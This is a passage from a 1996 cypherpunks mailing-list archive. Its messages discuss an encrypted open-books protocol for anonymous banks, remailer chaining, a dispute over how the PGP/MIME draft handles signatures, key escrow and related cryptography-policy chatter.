followup articles by Hal Finney and Eric Hughes.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 23 May 1996 15:59:30 +0800
To: cypherpunks@toad.com
Subject: PROTOCOL: Encrypted Open Books
Message-ID: <adc928540102100468bb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Mon, 16 Aug 93 22:25:47 PDT
>To: cypherpunks@toad.com
>Subject: PROTOCOL: Encrypted Open Books
>From: hfinney@shell.portal.com
>Status: OR
>
>Eric had some good ideas in his protocol for verifying anonymous bank
>deposits.  One thing wasn't clear to me: what if the bank creates
>a fake account?
>
>It would seem that the bank could explain away a sudden decrease in its
>asset reserves (money that the bank officers actually spent on mistresses
>and drugs) by creating a fake anonymous account which made a large with-
>drawal.  The books would still balance.
>
>It wasn't clear to me in Eric's protocol whether it would be expected that
>the identity of accounts which made such withdrawals would be revealed.
>Doing so would seem to go against the purpose of the digital bank.  But
>without that ability it would seem that fake accounts could cover up any
>amount of mismanagement.
>
>Hal

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 23 May 1996 18:08:59 +0800
To: cypherpunks@toad.com
Subject: PROTOCOL: Encrypted open books
Message-ID: <adc92881020210047351@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 26 Aug 93 11:28:14 -0700
>From: Eric Hughes <hughes@soda.berkeley.edu>
>To: cypherpunks@toad.com
>Subject: PROTOCOL: Encrypted open books
>Status: OR
>
>Note: I started this reply last week; I've decided to post what I
>know, since I don't have a solution and I've run out of simple ideas
>for now.
>
>Hal' criticism that (real) money could leak out of the system is
>correct.  The problem is that while the books would still balance,
>i.e. sum to zero, some fake depositor would have a negative balance,
>the net result of taking out more money than you put in.  Negative
>numbers just aren't allowed in double-entry bookkeeping, but they were
>allowed in the first protocol set.
>
>The first part of the solution is to allow no private accounts on the
>left hand (asset) side of the ledger, in other words, no anonymous
>loans.  A protocol for doing anonymous loans could be invented, but
>since the first problem is merely to run a money exchange and not more
>complicated financial services, this is acceptable.  Most of the money
>that left the S&L's was by corrupt loan practices, so I don't consider
>this omission a particularly glaring one right now.
>
>Therefore all the private accounts must be on the right hand side,
>that is, they are all liabilities.  In layman's terms, the bank owes
>you; should you ask for your money, they have to give it to you.  If
>we can verify that each of these accounts never goes negative, then we
>can be certain that if the books balance, that the amounts of money in
>each account are accurate.
>
>Consider this.  If money was transferred from your account to another
>one, that transaction shows up in the public encrypted transaction
>record.  If you have due diligence over this record, you can assertain
>that no transaction was performed against your will.  This case
>corresponds to a debit and credit against two customer accounts,
>decreasing one and increasing the other.
>
>Another way that money might end up in a fake account if it were
>credited with assets.  A debit to an asset increase its value and the
>credit to the account increases that value.  This is the case of a
>deposit; the bank gets cash (+asset) and credits someone's account
>(+account).  Now if they want to give someone money this way, they
>have to do so by increasing the assets somehow; in other words, they
>money has to come from somewhere.  It didn't come from any of the
>customers because they've already verified that.  It didn't magically
>appear from one of the other asset accounts because these are all
>publically audited.
>
>In summary, we need to ensure that all accounts have positive balance.
>Public accounts can be revealed and seen to be positive.  Private
>accounts need a cryptographic assurance.
>
>A private account starts off at zero.  This can be publically
>revealed.  Then to the encrypted transaction log and the public cyclic
>balances we add publication of the private balances in encrypted form
>that allows us to verify to the blinded balance is positive.  This
>balance is verifiably linked to previous cyclic balances via the
>transaction log.  It is therefore linked all the way back to the
>beginning balance which was zero.
>
>Consider all the transaction triples for which the first element is
>equal to the private account in question, since the account was
>opened.  Take a product of all of the second elements and a product of
>all the third elements.  It is clear that these products can be
>calculated inductively from the previous cyclic products and the
>activity in this cycle.
>
>The products on second and third elements are equal to
>
>        g^( Sum x_i,j,t + Sum r_i,j,t ), h^( Sum r_i,j,t )
>
>where I've added a time index by cycle which was implicit before.  The
>notation for the inductive calculation is different, of course, and
>also obscures the underlying invariant.
>
>What we want is a certificate that Sum x_i,j,t is positive.  Here it
>gets a bit hairy.  There are likely other solutions to this technical
>requirement; here is the one I thought up yesterday and today.
>
>I thought I had an idea with promise on how to create such
>certificates using quadratic residuosity, but it doesn't work.  I'm
>still thinking about it; this certificate doesn't seem impossible to
>create, but the standard ideas that I know about in algebraic protocol
>design don't seem to work.
>
>If anybody wants to work on this technical point off-line with me,
>send me mail.  The math involved is advanced enough that I'd prefer to
>post summaries of work rather than all the detailed discussion.
>
>Another non-technical attack on the problem is to require periodic
>bank holidays, where all private balances will be revealed to be zero
>(preferably), or whatever is actually in the account.  This doesn't
>prevent owner fraud, but does put an upper bound on the time in which
>to perpetrate it.
>
>Eric






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 23 May 1996 15:38:27 +0800
To: /dev/null <declan+@CMU.EDU>
Subject: Re: FTC online workshop on privacy
In-Reply-To: <klcpb=W00YUzQG9W5E@andrew.cmu.edu>
Message-ID: <Pine.GUL.3.93.960522202315.18119A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, Declan B. McCullagh wrote:

> Did you know May 20-26 is "Safe Cyber Week?"

Of course! Didn't everybody?
-- 
rich.graves@stanford.edu
this is safe cyber week!
http://www.cybercorp.net/safe/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Thu, 23 May 1996 14:10:54 +0800
To: dsmith@prairienet.org
Subject: Re: Long-Lived Remailers
In-Reply-To: <199605212215.RAA13102@cdale1.midwest.net>
Message-ID: <9605230140.AA12217@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



>From: "David E. Smith" <dsmith@midwest.net>
>Date: Tue, 21 May 1996 17:31:23 -0600

>Actually, there's an Idea.  Set up a single address; use added
>headers in the style of:
>
>::
>Remailers-To-Chain: 7
>Remailers-To-Avoid: remailer@nsa.gov
>Final-Destination: tcmay@got.net

David,

This will not work.  The original sender must pick the path himself,
if maximum encryption to hide the final destination is to be used.
The properly used cypherpunks-style remailer network provides that as
long as even one remailer in the chain is trustworthy, your secret is
safe.  Under your scheme, if the first remailer is untrustworthy,
everything is blown.  This is because unless the original sender
pick's the path (or at least the last hop explicitly), the final
destination and message must be available to each hop.

Loren




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 13:36:27 +0800
To: unicorn@schloss.li
Subject: Re: PROPOSAL
Message-ID: <01I50Q8K5UQO8Y4XFA@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 22-MAY-1996 20:48:51.42

>Motion: To create the alt.politics.assassination.politics newsgroup and
>the "AP" mailing list so as to clear the meaningless traffic (for which I
>am significantly responsible) out of this forum.

>Any seconds?

	So long as the AP list is specifically for debates about the ethics of
such, seconded. If it would remove from cypherpunks discussion of
implementation or of social consequences, that wouldn't be good, since the
implementation of this is definitely cypherpunks material.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Thu, 23 May 1996 17:01:39 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <v02140b02adc99220960b@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> comments on the responsiblity
of prudent persons (in, I presume, the context of threating e-mail
sent through an anonymous remailier).

I'm still perplexed: what can a "prudent" remailer operator do if a
threatening e-mail was sent through a remailer under one or more of
the following conditions:

-- The remailer operator is legally enjoined from reading messages
   transversing his system. (For example, the remailer is subject to
   data privacy laws.)

-- The message was encrypted using the intended recipient's public key.
   (This means that, without access to the private key, the operator
   has no mechanism to examine the e-mail.)

Confused in Cupertino.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: elkins@antares.aero.org (Michael Elkins)
Date: Thu, 23 May 1996 17:54:35 +0800
To: paul.elliott@Hrnowl.LoneStar.ORG (Paul Elliott)
Subject: Re: PGP MIME INTERNET DRAFT considered harmful.
In-Reply-To: <31a3910d.flight@flight.hrnowl.lonestar.org>
Message-ID: <199605230403.VAA14508@zzyzx.aero.org>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3941.1071713579.multipart/signed"

--Boundary..3941.1071713579.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

On May 22, paul.elliott@Hrnowl.LoneStar.ORG (Paul Elliott) wrote:
> I as you should know, I have never said that base64 should never be used.
> I merely say that signatures should be taken over the original binary data.
> Base64 can be used for transport as needed, but it should be a convention
> that the any base64 is removed before signatures are checked.

However, this method does not allow for any verification of the content-type
headers for that part.

> As my examples show, some users may have legitimate reasons for
> wishing to attach a generally useful PGP signature to a MIME message.

> PGP MIME should allow users to sign those documents the user wishes
> to sign, faithfully transmitting those signatures to the receiver. It should 
> not dictate that a user will sign an unintelligible artifact of a data 
> transmission system.

Your last two comments really illustrate the divison that we've previously
seen on the pgp-mime list.  On the one side you have those who want to
include the MIME headers in the digital signature, and on the other are those
who want the signature to be over the data in it's "binary" (unencoded)
form.  I _do_ see merit in the latter.  However, that was not the goal of
my draft.  What I've been trying to get across is that my draft does not
preclude you from writing your own draft on how to transmit detached
signatures along with your message (perhaps something like
multipart/pgp-signed).

> Pressure will build for PGP MIME to support binary datapaths.

When this occurs, I will glady remove that restriction.

> PGP MIME will have to go through a complicated migration path
> to phase in this transition. All this complexity can be avoided by
> doing the right thing now.

Complex migration path?  How so?  Implementations that accept both
7-bit and 8-bit PGP messages but only generate 7-bit messages will
not suffer in the least if one day we decide it's ok to generate 8-bit
signed messages.  They will still accept either.  Newer versions of
the software can make use of the 8-bit path and it will interoperate
perfectly with older versions.

> Users should have a policy of only attesting to statements by digital
> signature, that they know _of their own personal knowledge_ is true.
> Any other policy is to court disaster.

This argument, which while true, doesn't make your approach any safer.  Any
software used is a proxy, and no matter how brilliant or naive the user
is, it's still a proxy.  There is some amount of trust that the software
is doing the "right thing."  It doesn't matter if I'm signing a PGP/MIME
message in my e-mail client or running PGP to encrypt a .gif or .jpg.

> I have gotten the impression that you guys have stopped listening.
> Everyone seems hell-bent on standardizing this inferior system that
> will lockin a poor design. I hoped that by appealing to a larger
> audience I could get more articulate and respected people to
> persuade you to rethink. Perhaps some of the cypherpunks can
> say something that will provoke an attack of sanity that will
> stop this inexorable march toward a bad standard.

No, we haven't stopped listening.  We've just heard these arguments arguments
over and over again for the past six months and nobody from that camp has
proposed an alternative.  Again, I do not believe the two methods are
mutually exclusive.  PGP/MIME is not meant do what I term "object security,"
it's meant for "transport security."

I think perhaps it's not so much PGP/MIME that you don't like, but the
whole multipart/security architecture in general.

me
-- 
Michael Elkins <elkins@aero.org>		http://www.cs.hmc.edu/~me
PGP key fingerprint: EB B1 68 32 3F B5 54 F9  6C AF 4E 94 5A EB 90 EC


--Boundary..3941.1071713579.multipart/signed
Content-Type: application/octet-stream; name="pgp00003.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00003.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjIK
CmlRQ1ZBd1VCTWFQamtHTjlvV0JnaFBESkFRSHc3UVArSUhtblpjY1VZeVdo
bmtsb1hjM253cS96ampBbjFLR0oKMmpYVkJkQjBDVWR1UHhDOU00Y1NJdzVm
N2pzd2NhSFlOWUV5ZlRtNUZGem9vdWFYMU5tRWZMdE9MWkxwZW13OApXaEJa
OU1sM0VXSjM0cVVENFBPaU1JeHZ2WFNLcTBadjVjM0lXSFZvdFR3V0x4S09Z
djMybFloQlU2NWlVSzN2CktnOVNwNTFENGxrPQo9V01mUAotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Boundary..3941.1071713579.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 23 May 1996 17:57:47 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: The Crisis with Remailers
In-Reply-To: <01I50KKMD21Q8Y4X9G@mbcl.rutgers.edu>
Message-ID: <Pine.GUL.3.93.960522211844.18119B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"bruce@aracnet.com"  "Bruce Baugh" 22-MAY-1996 17:00:33.67
> 
> >Pointing people at legitimate uses of anonymity, as various folks have
> >suggested, is undoubtedly a good idea. Would anyone care to suggest a few
> >newsgroups where the vast majority of anonymous posts have really good
> >reasons for being so?
> 
> 	While it isn't usage of true cypherpunk remailers, the sexual abuse
> survivors newsgroup(s) would appear to be a place to start. Some of the groups
> discussing human rights cases are also a possibility, as is
> alt.religion.scientology. 

To those unfamiliar with the issues, ars is not a good example. At first,
it looks like a bunch of louts screaming.

I'd mention alt.revisionism, where anonymity is used and recognized by all
sides, usually responsibly (though that probably wasn't true before I
dropped in). It's the stupid skinheads configuring Netscape with
"anonymous" addresses that bug me; I usually find their real address and
tell them how to get a real remailer or freenet account. 

Of course, to people who don't know what to filter, alt.revisionism also
looks like a bunch of louts screaming. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 23 May 1996 14:53:45 +0800
To: "Alan B. Clegg" <abc@gateway.com>
Subject: Re: Number one story on CNN this hour.
In-Reply-To: <Pine.BSI.3.91.960522153155.264g-100000@black-ice.gateway.com>
Message-ID: <Pine.SUN.3.91.960522220202.10038B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, Alan B. Clegg wrote:

> There are 40 million 'attack capable' systems connected to the Internet 
> and over 120 countries have developed or are developing 'attack software'.

Does that mean I need a concealed carry permit for my Newton? 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: R.Hirschfeld@cwi.nl
Date: Thu, 23 May 1996 10:57:40 +0800
To: perry@piermont.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605221904.PAA23720@jekyll.piermont.com>
Message-ID: <9605222009.AA04459=ray@groen.cwi.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Wed, 22 May 1996 15:04:04 -0400
> From: "Perry E. Metzger" <perry@piermont.com>
> 
> Floating point systems are built to do approximate math on a very wide
> range of number sizes. Accounting systems require exact math -- down
> to the cent. Floats aren't suitable.

I completely agree.  But are the usual fixed-point representations
adequate for exchange rates, where it's not a matter of "down to the
cent" but of ratios of cents and centimes?  Is an exact representation
of rationals (e.g., pairs of integers) needed?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schaefer@z-code.ncd.com (Barton E. Schaefer)
Date: Thu, 23 May 1996 18:23:47 +0800
To: Paul Elliott <pgp-mime@purpletape.cs.uchicago.edu
Subject: Re: PGP MIME INTERNET DRAFT considered harmful.
In-Reply-To: <31a3910d.flight@flight.hrnowl.lonestar.org>
Message-ID: <960522223315.ZM13949@zyrcon.z-code.com>
MIME-Version: 1.0
Content-Type: text/plain


On May 22, 11:11pm, Paul Elliott wrote:
} Subject: Re: PGP MIME INTERNET DRAFT considered harmful.
}
} > > Suppose we want to send a signed .gif file to a sysop. The
} > > sysop wants to store the .gif in his download section. Suppose the sysop
} > > wants to store the signature as a detached signature so that people who
} > > download it can check the authorship. But the signature proposed by the
} > > PGP-MIME draft is useless for this purpose. It has MIME headers attached
} > > and it has been base64'ed. People who download such a file from a BBS
} > > have no use for it, unless they have MIME.
} > 
} > [...several other examples deleted...]
} > 
} > PGP/MIME is _not_ meant to be used in this fashion!  It never was!
} > PGP/MIME is only to be used for transport, not for long term storage.
} > If you need a persistent signature, you should generate a detached
} > signature as an attachment.
} 
} It should allow users to use it in such a fashion! PGP MIME should
} respect the wishes of the users! Software should not view users
} as tools to accomplish some goal predetermined by developers, but it
} should rather make it easy for the user to accomplish what the user
} wants!

PGP/MIME is not software!  PGP/MIME is a *spec* for *one part* of what
comprehensive secure email software should provide!  PGP/MIME is not
required to specify the entire software system, and should *not* be
interpreted as limiting the system to only the part it discusses!

I think that's enough exclamation points.  If you want a spec for the
kind of usage described above, one can be created.  Then, if it seems
necessary, yet a third spec can reference both PGP/MIME and your new
spec, and say that a mail system conforming to PGP security standards
shall provide both PGP/MIME and this other usage, and any other that
you happen to think of.  There's no reason to expect PGP/MIME to *be*
that all-encompassing third spec.  That's not what PGP/MIME is for,
which is what Michael has been trying to say all along.

} PGP MIME should allow users to sign those documents the user wishes
} to sign, faithfully transmitting those signatures to the receiver. It
} should not dictate that a user will sign an unintelligible artifact of
} a data transmission system.

Sigh.  The *point* is to use PGP to verify or secure the transmission
system -- not merely to secure the content being transmitted.  How can
that be done without including some "artifact" of the transmission within
the signed or encrypted content?

} > There is also another reason to sign the encoded version.  Remember that
} > it also includes the content headers of that part.  This is very important
} > especially for automated processing of messages.
} 
} The typical user does not necessarily know the difference between
} a .gif and a .jpg file. He only knows he wants to send this pretty picture
} on the screen.
} 
} If Malley ( the active message hacker ) hacks the content-type
} MIME line, all that will happen is that the message to be sent
} to the .gif viewer rather than the .jpg viewer, causing the message
} to be lost. But Malley already had the ability to loose the message,
} after all, he hacked it didn't he? In general, the content type line
} should not be signed.

I put forth this very issue on the IMC resolving-security mailing list
some weeks ago.  I encourage anyone who wasn't involved in the IMC
secure email discussions to check out the archive at:

    http://www.imc.org/workshop/mail-archive/

Briefly, the important thing to remember is that the content type is
not the only interesting thing that may appear in the MIME headers.
The headers may include checksums, part identifiers for external parts,
and so on.  There *is* a difference between securing a MIME body part
and securing the data contained in the part; RFC1847 applies in those
cases where securing the body part is important, and PGP/MIME applies
when you want to use PGP as the security mechanism.  That's it.

} If some technically advanced user wants to sign the content-type
} line, his wishes should be accommodated. But it should not be made
} a requirement that technically unsophisticated users attest to things
} they have no hope of understanding!

By that argument, users shouldn't be signing GIF or JPEG images either,
unless they know they're not just a pretty picture.

However, the thing to wrap your brain around is that IT IS NOT BEING
MADE A REQUIREMENT that the MIME headers be signed.  PGP/MIME specifies
*how* you sign (or encrypt) the MIME headers along with the content
*when that is the intent*.

The non-technical user doesn't need to know what the headers he's
signing are, any more than he needs to be able to read GIF format.
He does need to understand whether he's signing a simple data object
or a specific transmission of that object.  That's up to his software
to make clear, but it's *not* up to the PGP/MIME specification.

} I have gotten the impression that you guys have stopped listening.

So far all your arguments seem predicated on misunderstanding of the 
goals and scope of the thing you're arguing against.  That makes *us*
the ones who've stopped listening?

} In the future, other binary transports will become more common.
} 7 bit datapaths will become less common.
} Pressure will build for PGP MIME to support binary datapaths.
} 
} PGP MIME will have to go through a complicated migration path
} to phase in this transition. All this complexity can be avoided by
} doing the right thing now.

Actually, the migration path is simple, obvious, and almost completely
compatible with the current specification.  The only migration required
is to lift the 7-bit constraint in PGP/MIME section 3, and to apply the
<CR><LF> canonicalization in section 5 only to parts whose C-T-E is not
`binary'.

Michael, what do you think about adding a remark about handling of
the `binary' C-T-E to section 5, with the stipulation that it is there
in anticipation of a future version of the protocol?  The section 3
restriction is obviously desirable at this time, but a lot of spurious
objections might go away if the transition plan were laid out.

-- 
Bart Schaefer                     Vice President, Technology, Z-Code Software
schaefer@z-code.com                  Division of NCD Software Corporation
http://www.well.com/www/barts           http://www.ncdsoft.com/ZMail/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Thu, 23 May 1996 18:27:58 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605230539.WAA09625@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The answer to information is more information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 23 May 1996 17:34:18 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Clipper III analysis
In-Reply-To: <v0300661badc9163cace1@[199.0.65.105]>
Message-ID: <Pine.GUL.3.93.960522224705.18119F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, Robert Hettinga wrote:

> At 1:58 PM  -0400 5/22/96, Bill Frantz wrote:
> 
> > John Gilmore wrote an excellent description of GAK 3
>                                                  ^^^^^
> I think we have a winner, folks! GAK3 it is...

In the "Nickelodeon" section of Great America amusement park in Sunnyvale,
there's a big sign covered with green ooze saying "Beware of GAK." It's
almost worth $18.00 to go back with a camera.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 23 May 1996 16:27:02 +0800
Subject: Re: Bit tax proposal?
In-Reply-To: <01I4ZMQQODUA8Y5IL9@mbcl.rutgers.edu>
Message-ID: <Pine.SV4.3.91.960522224429.8831E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


<< "  Govt has not yet figured out how to tax this new wealth" >>  

     That is the main reason it came into being. Start taxing it on some 
arbitrary basis, and people won't bother creating it.



<< " Proposed is an easily administered" >>


   " My convenience as a bureacrat is more important than the convenience 
of the people who are creating wealth" >>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Thu, 23 May 1996 15:24:34 +0800
To: cypherpunks@toad.com
Subject: Re: Layman's explanation for limits on escrowed encryption ...
In-Reply-To: <199605230053.RAA28116@ohio.chromatic.com>
Message-ID: <9605230303.AA17239@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


> Could someone with some knowledge of NSA/DoS/FBI intentions please
> explain why key length limitations are necessary for escrowed
> encryption?

	Obviously it's so they can keep feeding international traffic
through the [Insert fav TLA here]'s 64-bit cracking machines.

	.5 * :), of course.  (Is this an acceptable use for floating
point :).

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Thu, 23 May 1996 15:02:01 +0800
To: elkins@aero.org (Michael Elkins)
Subject: Re: PGP MIME INTERNET DRAFT considered harmful.
In-Reply-To: <199605201710.KAA23072@muddcs.cs.hmc.edu>
Message-ID: <31a3910d.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 
> [Note: CC'd to the pgp-mime list.]
> 
> Paul Elliott writes:
> > [Encrypted & Signed binary data.] 
> > Now when there is a data path for PGP's cyphertext, PGP provides a
> > binary data path for its plain text. Thus, the inner base64 that PGP
> > MIME internet draft requires is totally unnecessary. It will cause a 30%
> > increase in the size of those messages that are encrypted and signed and
> > large amounts of CPU time will be used applying & removing the base64.
> 
> This design decision actually serves a purpose.  The scenario is as
> follows:  Suppose you are a company which has west-coast and east-coast
> offices, and the only connectivity which exists is via the open Internet.
> Suppose further that you wished to send out a company memorandum to all
> the employees.  Obviously you will want to sign and encrypt your message.
> However, one it reaches your offices, you would like to have the encryption
> "layer" stripped leaving just the signed message.  Now, if when you generated
> that message you did not restrict yourself to 7 bits, there is a likely
> probability given todays software, that you are not going to be able to
> transmit that message over an SMTP framework.

I as you should know, I have never said that base64 should never be used.
I merely say that signatures should be taken over the original binary data.
Base64 can be used for transport as needed, but it should be a convention
that the any base64 is removed before signatures are checked.

Using this convention, it is easy to see that the node that strips encryption
could add base64 without invalidating the signature, because of the
convention that the base64 so added will be removed before the signature
is checked on the original binary data.

> 
> Now, this does present some bloat for people who do not strip the encryption,
> but it seems far better to design the protocol such that this case will
> work.
> 
> > [Signed binary data.]
> > Now let us consider the question of what PGP-MIME draft requires users
> > to sign. Suppose we want to send a signed .gif file to a sysop. The
> > sysop wants to store the .gif in his download section. Suppose the sysop
> > wants to store the signature as a detached signature so that people who
> > download it can check the authorship. But the signature proposed by the
> > PGP-MIME draft is useless for this purpose. It has MIME headers attached
> > and it has been base64'ed. People who download such a file from a BBS
> > have no use for it, unless they have MIME.
> 
> [...several other examples deleted...]
> 
> PGP/MIME is _not_ meant to be used in this fashion!  It never was!  PGP/MIME
> is only to be used for transport, not for long term storage.  If you need
> a persistent signature, you should generate a detached signature as an
> attachment.

It should allow users to use it in such a fashion! PGP MIME should
respect the wishes of the users! Software should not view users
as tools to accomplish some goal predetermined by developers, but it
should rather make it easy for the user to accomplish what the user
wants! This attitude of service causes software to be in harmony with
market forces and leads to success! (Market forces apply to freware/guiltware/
copylefted/public domain software as well as software for sale or licence.)

By existing in a context of service, PGP MIME can make encryption
easy to use and become widespread. By doing so, it can entrench
the widespread use of encryption, making it politicly impossible to
regulate it! Thus, it can confound the evil plans of those dark forces
that seek to enslave us all!

As my examples show, some users may have legitimate reasons for
wishing to attach a generally useful PGP signature to a MIME message.

Not all users are technically sophisticated, it would be nice if PGP_MIME
could accommodate such wishes.

Digital signatures are an unrevokable record of what a person believes
and attests to at a given time. Belief is an attribute of persons, that
is not subject to command, certainly not by a piece of software.

PGP MIME should allow users to sign those documents the user wishes
to sign, faithfully transmitting those signatures to the receiver. It should 
not dictate that a user will sign an unintelligible artifact of a data 
transmission system.

> 
> > If users get in the habit of signing binary files which represent
> > multimedia data, and which can not be examined with commonly available
> > inspection tools, it is inevitable and predictable that sooner or later
> > this will cause some kind of negative security event.
> 
> By this argument nobody should bother signing e-mail or news posts.  I
> haven't seen any good tools to handle this easily for PC's and Macs.
> New proposals have to be made before the tools become available.  This
> draft is the result of experience with what does and doesn't work.
> For example, the application/pgp content-type which many people like
> is horribly broken for what it's probably used for 95% of the time.
> 
> > There is no good reason to sign the base64 rather than the original
> > data. Once a file has been base64ed, the file can not be examined
> > with the usual inspection tools.
> 
> Yes, base64 is just another stream of bytes, but there are FEW places on
> the Internet SMTP framework that can support BINARY transport.  BINARY
> streams often contain very long lines which existing software simply can't
> handle.

You are ignoring an already exiting binary transport, that exists right now.
Namely, PGP provides a BINARY datapath for its plaintext!

In the future, other binary transports will become more common.
7 bit datapaths will become less common.
Pressure will build for PGP MIME to support binary datapaths.

PGP MIME will have to go through a complicated migration path
to phase in this transition. All this complexity can be avoided by
doing the right thing now.

Make the method of representing the data for signatures independent
of the representation of the data for transport!

It might take some effort for PGP-MIME annalists and developers now.
But that effort, will be more than repaid by saving people the hassle
of having to clean up an intolerable mess later!

I do not see exactly how this should be done for multipart messages
in detail right now. That is why I have not made a specific proposal.
But I do see that it should be possible to come up with such a representation.

That is why I say that the draft should be withdrawn and sent back
for further study.

> 
> There is also another reason to sign the encoded version.  Remember that
> it also includes the content headers of that part.  This is very important
> especially for automated processing of messages.

The typical user does not necessarily know the difference between
a .gif and a .jpg file. He only knows he wants to send this pretty picture
on the screen.

Users should have a policy of only attesting to statements by digital
signature, that they know _of their own personal knowledge_ is true.
Any other policy is to court disaster.

If Malley ( the active message hacker ) hacks the content-type
MIME line, all that will happen is that the message to be sent
to the .gif viewer rather than the .jpg viewer, causing the message
to be lost. But Malley already had the ability to loose the message,
after all, he hacked it didn't he? In general, the content type line
should not be signed.

If some technically advanced user wants to sign the content-type
line, his wishes should be accommodated. But it should not be made
a requirement that technically unsophisticated users attest to things
they have no hope of understanding!

> 
> > The typical user of MIME software is not necessarily technically
> > sophisticated. When the deficiencies and disasters associated with
> > software patterned on this draft become apparent, not everyone will know
> > exactly which software component is at fault. The problems associated
> > with the draft (or its successors) may adversely affect the reputation
> > of PGP.
> 
> Bad implementations can always adversely affect your reputation, even if
> the theory behind it is solid.  The average non-technical user which you
> have been describing in this message will should not even be aware of
> the underlying details if the implementation is done correctly.
> 
> > The draft should be withdrawn. People should rethink and create a better
> > plan to combine the benefits of PGP and MIME.
> 
> You are more than welcome to submit your proposal the the pgp-mime mailing
> list.  [send mail to pgp-mime-request@lists.uchicago.edu with a subject of
> "subscribe"]

I have gotten the impression that you guys have stopped listening.
Everyone seems hell-bent on standardizing this inferior system that
will lockin a poor design. I hoped that by appealing to a larger
audience I could get more articulate and respected people to
persuade you to rethink. Perhaps some of the cypherpunks can
say something that will provoke an attack of sanity that will
stop this inexorable march toward a bad standard.


> 
> We've seen a lot of different proposals go by, and none of them have stood
> up to PGP/MIME.  From my point of view, most of the problems that people
> have with the draft is their failure to understand what it is to be used
> for.  Many people have the impression that PGP/MIME is meant to be the
